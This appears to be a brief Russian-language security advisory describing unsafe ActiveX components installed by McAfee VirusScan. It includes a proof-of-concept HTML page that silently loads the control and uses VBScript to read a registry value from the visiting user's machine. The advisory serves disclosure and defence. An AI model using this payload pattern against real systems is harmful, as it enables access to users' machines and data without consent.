Программа: McAfee VirusScan
Уязвимость обнаружена в McAfee VirusScan. Удаленный пользователь может получить доступ к целевой системе пользователя.
Программа устанавливает несколько небезопасных ActiveX компонентов. Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, вызовет уязвимое ActiveX управление и получит доступ к системе целевого пользователя.
Пример:
<html>
<object classid="clsid:4C29D864-C55A-46DD-865C-17A1B7CC1A1A" id="gobjReg"
style="display: none;">
</object>
<h1>McAfee installer test</h1>
<script language="vbscript">
document.write( _ gobjReg.RegQueryValue( "HKCU\Control Panel\Desktop",
"Wallpaper") _ )
</script>
</html>
